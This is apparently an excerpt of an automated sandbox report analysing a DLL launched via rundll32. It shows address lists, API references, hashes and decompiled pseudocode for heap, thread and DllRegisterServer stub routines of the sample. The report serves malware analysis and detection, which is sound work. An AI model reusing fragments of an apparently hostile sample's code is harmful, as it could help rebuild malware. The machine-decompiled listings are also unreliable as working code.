                                                                        0x10005f53
                                                                        0x10005f5f
                                                                        0x10005f79
                                                                        0x10005f86
                                                                        0x10005f87
                                                                        0x10005f8c
                                                                        0x10005f91
                                                                        0x00000000
                                                                        0x10005f93
                                                                        0x10005f93
                                                                        0x10005f98
                                                                        0x10005f9e
                                                                        0x10005fa4
                                                                        0x10005fc1
                                                                        0x10005fd5
                                                                        0x10005fd6
                                                                        0x10005fdb
                                                                        0x10005fe0
                                                                        0x00000000
                                                                        0x10005fe2
                                                                        0x10005fe2
                                                                        0x10005ffb
                                                                        0x10005ffc
                                                                        0x10006001
                                                                        0x10006006
                                                                        0x1000601d
                                                                        0x10006022
                                                                        0x10006026
                                                                        0x1000610e
                                                                        0x1000611d
                                                                        0x1000602c
                                                                        0x10006031
                                                                        0x100060a5
                                                                        0x100060aa
                                                                        0x100060b0
                                                                        0x100060c4
                                                                        0x100060d4
                                                                        0x10006101
                                                                        0x1000610c
                                                                        0x10006033
                                                                        0x10006033
                                                                        0x10006039
                                                                        0x1000603f
                                                                        0x10006045
                                                                        0x1000606d
                                                                        0x1000608f
                                                                        0x10006095
                                                                        0x100060a4
                                                                        0x100060a4
                                                                        0x10006031
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006006
                                                                        0x10005fe0
                                                                        0x10005f91
                                                                        0x10005e5a
                                                                        0x10005a9d
                                                                        0x10005aa1
                                                                        0x10005aa8
                                                                        0x10005acc
                                                                        0x10005ad7
                                                                        0x10005ae7
                                                                        0x10005ae7
                                                                        0x1000591a
                                                                        0x1000591a
                                                                        0x10005920
                                                                        0x1000592b
                                                                        0x10005936
                                                                        0x10005943
                                                                        0x10005947
                                                                        0x10005957
                                                                        0x10005981
                                                                        0x10005989
                                                                        0x1000598d
                                                                        0x100059a0
                                                                        0x100059ae
                                                                        0x100059cb
                                                                        0x100059d2
                                                                        0x100059e7
                                                                        0x100059f1
                                                                        0x100059f3
                                                                        0x100059f8
                                                                        0x100059fc
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x10005a02
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x100059fc
                                                                        0x10005914
                                                                        0x10005803
                                                                        0x10005505
                                                                        0x100054cb
                                                                        0x10005488
                                                                        0x10005409
                                                                        0x10005361

                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                        • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                        • memcpy.MSVCRT ref: 10005CEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1755227880-0
                                                                        • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                        • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}






                                                                        0x100350ef
                                                                        0x100350f4
                                                                        0x100350f7
                                                                        0x100350fa
                                                                        0x100350fd
                                                                        0x10035107
                                                                        0x1003510a
                                                                        0x10035110
                                                                        0x10035120
                                                                        0x10035112
                                                                        0x1003511b
                                                                        0x1003511b
                                                                        0x10035123
                                                                        0x10035128
                                                                        0x1003512a
                                                                        0x1003512f
                                                                        0x1003513a
                                                                        0x10035143
                                                                        0x1003514f
                                                                        0x10035152
                                                                        0x10035155
                                                                        0x10035158
                                                                        0x1003515b
                                                                        0x1003515e
                                                                        0x10035161
                                                                        0x10035164
                                                                        0x10035167
                                                                        0x1003516d
                                                                        0x10035170
                                                                        0x10035177
                                                                        0x1003517e
                                                                        0x10035181
                                                                        0x10035187
                                                                        0x1003518a
                                                                        0x10035190
                                                                        0x10035193
                                                                        0x10035196
                                                                        0x1003519c
                                                                        0x100351a2
                                                                        0x100351a5
                                                                        0x100351a9
                                                                        0x100351b7
                                                                        0x100351bf

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100350EF
                                                                          • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                        • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                          • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                          • Part of subcall function 10011F76: _strcat.LIBCMT ref: 10011F94
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentH_prologThread$_strcat_strlen
                                                                        • String ID:
                                                                        • API String ID: 268772951-0
                                                                        • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                        • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005090 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 226 10005090-10005097 227 100050a0-100050ab call 10004780 226->227 228 10005099-1000509a ExitProcess 226->228 231 100050b0-100050b2 227->231
                                                                        C-Code - Quality: 64%
                                                                        			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x315fcf0
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}




                                                                        0x10005090
                                                                        0x10005097
                                                                        0x1000509a
                                                                        0x1000509a
                                                                        0x100050a0
                                                                        0x100050a5
                                                                        0x100050ae
                                                                        0x100050b2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: DllRegisterServer
                                                                        • API String ID: 621844428-1663957109
                                                                        • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                        • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 1001382a-10013842 call 10012514 235 10013845-1001384d 232->235 236 10013844 232->236 237 100138b4-100138b6 235->237 238 1001384f-10013856 235->238 236->235 239 100138b8-100138be 237->239 240 100138dd 237->240 241 10013858-1001386a 238->241 242 1001389f-100138a1 238->242 239->240 245 100138c0-100138c9 call 10014676 239->245 243 100138df-100138e4 call 1001254f 240->243 241->242 246 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 241->246 242->240 244 100138a3-100138b2 RtlAllocateHeap 242->244 244->237 245->235 254 100138cf 245->254 246->244 258 10013891-1001389c call 10011c50 246->258 254->243 258->242
                                                                        C-Code - Quality: 76%
                                                                        			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}









                                                                        0x1001382a
                                                                        0x1001382c
                                                                        0x10013831
                                                                        0x10013839
                                                                        0x1001383d
                                                                        0x10013842
                                                                        0x10013844
                                                                        0x10013844
                                                                        0x10013845
                                                                        0x10013845
                                                                        0x10013847
                                                                        0x1001384d
                                                                        0x100138b4
                                                                        0x100138b6
                                                                        0x100138dd
                                                                        0x100138dd
                                                                        0x100138df
                                                                        0x100138e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100138b6
                                                                        0x10013856
                                                                        0x1001389f
                                                                        0x100138a1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100138a3
                                                                        0x100138ac
                                                                        0x100138b2
                                                                        0x00000000
                                                                        0x100138b2
                                                                        0x1001385b
                                                                        0x1001385e
                                                                        0x10013861
                                                                        0x10013864
                                                                        0x1001386a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001386e
                                                                        0x10013874
                                                                        0x10013877
                                                                        0x1001387e
                                                                        0x10013881
                                                                        0x10013885
                                                                        0x1001388a
                                                                        0x1001388f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013897
                                                                        0x1001389c
                                                                        0x00000000
                                                                        0x100138c0
                                                                        0x100138c7
                                                                        0x00000000

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 1001386E
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap__lock
                                                                        • String ID:
                                                                        • API String ID: 4078605025-0
                                                                        • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                        • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 100107c8-100107d9 call 10012514 264 10010833-10010838 call 1001254f 261->264 265 100107db-100107e2 261->265 267 10010824 265->267 268 100107e4-100107fc call 10013a38 call 10013b9b 265->268 269 10010825-1001082d RtlFreeHeap 267->269 275 10010807-10010814 call 1001081b 268->275 276 100107fe-10010806 call 10013bc6 268->276 269->264 275->264 281 10010816-10010819 275->281 276->275 281->269
                                                                        C-Code - Quality: 18%
                                                                        			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}







                                                                        0x100107c8
                                                                        0x100107ca
                                                                        0x100107cf
                                                                        0x100107d4
                                                                        0x100107d9
                                                                        0x100107e2
                                                                        0x10010824
                                                                        0x00000000
                                                                        0x100107e4
                                                                        0x100107e6
                                                                        0x100107ec
                                                                        0x100107f1
                                                                        0x100107f7
                                                                        0x100107fc
                                                                        0x100107fe
                                                                        0x100107ff
                                                                        0x10010800
                                                                        0x10010806
                                                                        0x10010807
                                                                        0x1001080b
                                                                        0x10010814
                                                                        0x10010816
                                                                        0x10010825
                                                                        0x10010825
                                                                        0x1001082d
                                                                        0x1001082d
                                                                        0x10010814
                                                                        0x100107e2
                                                                        0x10010838

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterFreeHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 3012239193-0
                                                                        • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                        • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 282 1001070f-10010725 call 10012514 285 10010755-10010757 282->285 286 10010727-1001072d 282->286 288 10010759 285->288 289 1001075a-10010761 285->289 286->285 287 1001072f-10010753 call 10013a38 call 1001437a call 10010781 286->287 287->285 293 10010778-1001077d call 1001254f 287->293 288->289 291 10010763-10010766 289->291 292 10010769-10010772 RtlAllocateHeap 289->292 291->292 292->293
                                                                        C-Code - Quality: 63%
                                                                        			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}






                                                                        0x1001070f
                                                                        0x10010711
                                                                        0x10010716
                                                                        0x1001071b
                                                                        0x10010725
                                                                        0x10010755
                                                                        0x10010757
                                                                        0x10010759
                                                                        0x10010759
                                                                        0x10010761
                                                                        0x10010766
                                                                        0x10010766
                                                                        0x10010772
                                                                        0x10010727
                                                                        0x10010727
                                                                        0x1001072d
                                                                        0x00000000
                                                                        0x1001072f
                                                                        0x10010731
                                                                        0x10010737
                                                                        0x1001073b
                                                                        0x10010742
                                                                        0x10010745
                                                                        0x10010749
                                                                        0x1001074e
                                                                        0x10010753
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010753
                                                                        0x1001072d
                                                                        0x1001077d

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10010731
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCriticalEnterHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 409319249-0
                                                                        • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                        • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 301 10013a83-10013aa1 HeapCreate 302 10013aa3-10013ab0 call 10013a69 301->302 303 10013acd-10013acf 301->303 306 10013ad0-10013ad3 302->306 307 10013ab2-10013abf call 10013b53 302->307 307->306 310 10013ac1-10013ac7 HeapDestroy 307->310 310->303
                                                                        C-Code - Quality: 100%
                                                                        			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}





                                                                        0x10013a94
                                                                        0x10013a9c
                                                                        0x10013aa1
                                                                        0x10013acd
                                                                        0x10013acf
                                                                        0x10013aa3
                                                                        0x10013aa3
                                                                        0x10013aab
                                                                        0x10013ab0
                                                                        0x10013ad3
                                                                        0x10013ac1
                                                                        0x10013ac7
                                                                        0x00000000
                                                                        0x10013ac7
                                                                        0x10013ab0

                                                                        APIs
                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                          • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                        • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocCreateDestroy
                                                                        • String ID:
                                                                        • API String ID: 2236781399-0
                                                                        • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                        • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
